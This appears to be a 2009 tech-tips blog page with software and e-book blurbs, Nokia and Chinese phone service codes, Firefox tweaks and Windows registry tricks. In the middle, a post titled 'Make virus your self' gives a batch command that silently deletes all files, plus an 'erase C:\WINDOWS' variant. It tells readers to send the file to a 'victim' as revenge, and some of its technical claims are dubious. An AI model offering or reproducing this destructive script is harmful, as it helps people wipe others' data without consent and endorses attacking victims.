Pages
About Us
- R@JE$H
Total Pageviews
Categories
- B-TECH Adda (26)
- C ++ Language (3)
- C Language (2)
- COMPUTER NETWORKS (6)
- DATA STRUCTURES (1)
- E-BOOKS (26)
- GATE (1)
- HTML AND XML E-BOOKS (3)
- JAVA MATERIALS (1)
- LINUX AND UNIX (5)
- MINI PROJECTS (1)
- ORACLE (3)
- PAPER PRESENTATIONS (1)
- pcs and laptops (5)
- SCIENCE (7)
- SOFTWARES (17)
- TECHNOLOGY (29)
- TIPS AND TRICKS (15)
- TOMCAT MATERIALS (1)
- WINDOWS (15)
Popular Posts
-
Now a days every one tries to backup or recover their data in hard drives this is a good idea but it consumes our worthful time to avoid t...
-
The heart are speakers that pump out 3 watts of your favorite music , and thankfully it has a rechargeable battery so you can always be ...
-
Keystroke logging is the practice of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person...
-
Flash 8: Projects for Learning Animation and Interactivity By Robert Hoekman, Jr. , Rich Shupe Publisher: O'Reilly Macromedia Flash ...
-
BOSS (Bharat Operating System Solutions) GNU/Linux distribution developed by C-DAC (Centre for Development of Advanced Computing) derived f...
-
Before informational input perceived by the mammalian brain is stored in the long-term memory, it is temporarily memorized in the hippocam...
-
This is a program on Bit stuffing and Character stuffing using C language This program is used for Networking. In this program it include...
-
T his guide is for students just starting out in the IT industry, but could just as well apply to anyone who wants to set themselves apart i...
-
By Robert ReinhardtandSnow Dowd John Wiley & Sons 2006 (1322 pages) There are lots of great...
-
The decade-old Open Office was the free and Open Source replication to Microsoft`s Office that has enriched it self in the office product...
Paint Dot Net
Paint.NET is an open-source freeware editor with all the essentials, including tools to crop, rotate, and resize images, adjust colors, and create collages. It supports common image formats--JPEG, PNG, GIF, TIFF, and others--but not high-resolution RAW files. There are enough basic and intermediate effects and features to keep image-tweakers happy, including a red-eye removal tool that has seen dramatic improvements. Unlike most free image editors, Paint.NET supports layers, history, and has an actions manager. The pleasing interface boasts semitransparent windows for ease of use.
Windows 7 Pocket Guide
Windows 7 – The Pocket Guide v 0.2.2
By Rich Robinson
Windows 7 is the Master’s Microsoft's Newest Operating System
- Getting Started
- Backup your data
- Security
- Window’s 7 New features
- system maintenance and management
- How to increase performance
- Customizing your start menu and Desktop
- Wallpapers, themes and screen savers
- Customize windows explorer
- work efficiently
- and many more sub topics…………….
Nokia cell phone cheat codes
These codes will work on most Nokia Mobile Phones to activate/deactivate advanced hidden functions that you can’t change through the phone menu.
Nokia Secret Codes
On the main screen type in:
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display(operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
FOR MORE NOKIA CHEAT CODES DOWNLOAD THE FILE
CHINA cell codes
Here are some of the codes for china mobiles try it
1)Default user code : 1122, 3344, 1234, 5678
2)Engineer mode : *#110*01#
3)Factory mode : *#987#
4)Enable COM port : *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200
5)Restore factory settings : *#987*99#
6)LCD contrast : *#369#
7)Software version : *#800#
8)Software version : *#900#
9)Set default language : *#0000# Send
10)Set English language : *#0044# Send
11)Set English language (new firmware) : *#001# Send
Interview Skills That Win The Job
Macromedia Flash 8 Bible
By
Robert ReinhardtandSnow Dowd
John Wiley & Sons 2006 (1322 pages)
There are lots of great Flash sites out there in the world. There are also just as many bad Flash sites that leave a bad impression of Flash in users' minds. One of my rules of thumb is that if a "skip" button is necessary, the application is probably not necessary.
Flash enables designers to develop, developers to design, and novices to create professional experiences. No other application available today can rival Flash for its ease of use, powerful development capabilities, multimedia features, and design power.
Mac users will notice increased performance within the Player, which is a welcome update. ActionScript gurus will appreciate the ability to control design elements at run-time, and improved debug and file uploading capabilities. Video performance and quality have been vastly improved over previous versions. Dynamic loading of GIFs and PNGs are a welcome addition as is the alpha channel support for video, stand-alone video encoder, and all the other video improvements. Robert explains how to make the most of these updates in clear and concise language.
Speed up Mozilla FireFox
Speed up Mozilla FireFox
-------------------------------------------------------------
1. Type "about :config" in the adress field.
2. Set the value of network.http.pipelining to "true".
3. Set the value of network.http.pipelining.maxrequests to "100".
4. Set the value of network.http.proxy.pipelining to "true"
5. Set the value of nglayout.initialpaint.delay to "0" (not availible in newer versions)
Data Structures E-Books
Addison Wesley C++ Algorithms, Data Structures
Algorithms and Data Structures - Niklaus Wirth
Brass - Advanced Data Structures (Cambridge, 2008)
Make virus your self
Make the virus your self
To delete all folders/files just put this:
DEL /F /Q *
Into notpad and save it as whateveryouwant.cmd
It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.
WARNING: DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER
If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C:\ and you'll see your Test.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:\WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.
Linux & Fedora Edition: The Complete Reference
Red Hat: The Complete Reference Enterprise Linux & Fedora Edition: The Complete Reference
Use this comprehensive guide to maximize the powerful capabilities of Red Hat Enterprise and Fedora Linux. Coverage includes Bluecurve, KDE, GNOME, deploying and managing servers and users, the 2.6 kernel, system and network security, and more……………..
Effective IT Project Management
This book provides a complete system for successfully completing any type of IT project on time and under budget. It includes simple procedures for setting schedules, getting team members on board, developing user manuals, and more!
Let us "C"
Add Your Name (or) Application to right click Of My Computer
As it is related to Windows regisrty it can be dangerous
so,Try This at ur own risk
To write your name on right click application
please follow the steps.
1.Copy/Paste the following code in Notepad And then Save it as .reg
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Your Name Or Name of the Application"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"
2.Now edit it and then Type your name In
Eg:
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Rajesh"
3. If u want to get any application, once you click Your name or name of application
Then , Type the location Of the application Which u want to open In:
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"
For eg.C:\Program Files\Yahoo!\Messenger\messenger.exe
Thats It finally save it And then Run it .
------------------------------------------------------------
To add Application Control Panel
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Control Panel\command]
@="rundll32.exe shell32.dll,Control_RunDLL"
To add Application Add/Remove
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Add/Remove\command]
@="control appwiz.cpl"
To add Application Reboot
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Reboot]\command]
@="shutdown -r -f -t 5"
To add Application Shutdown
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Shutdown]\command]
@="shutdown -s -f -t 5"
Multiple Logins in yahoo without Software
About Author
Labels
- B-TECH Adda (26)
- C ++ Language (3)
- C Language (2)
- COMPUTER NETWORKS (6)
- DATA STRUCTURES (1)
- E-BOOKS (26)
- GATE (1)
- HTML AND XML E-BOOKS (3)
- JAVA MATERIALS (1)
- LINUX AND UNIX (5)
- MINI PROJECTS (1)
- ORACLE (3)
- PAPER PRESENTATIONS (1)
- pcs and laptops (5)
- SCIENCE (7)
- SOFTWARES (17)
- TECHNOLOGY (29)
- TIPS AND TRICKS (15)
- TOMCAT MATERIALS (1)
- WINDOWS (15)
Blog Archive
-
▼
2009
(85)
-
▼
November
(18)
- Word to Pdf Converter
- Paint Dot Net
- Windows 7 Pocket Guide
- Nokia cell phone cheat codes
- Websites for Dummies
- CHINA cell codes
- Interview Skills That Win The Job
- Macromedia Flash 8 Bible
- Speed up Mozilla FireFox
- Data Structures E-Books
- English Grammar workbook for Dummies
- Make virus your self
- Linux & Fedora Edition: The Complete Reference
- Effective IT Project Management
- Let us "C"
- Add Your Name (or) Application to right click Of M...
- Multiple Logins in yahoo without Software
- Windows Vista Customization Manual
-
▼
November
(18)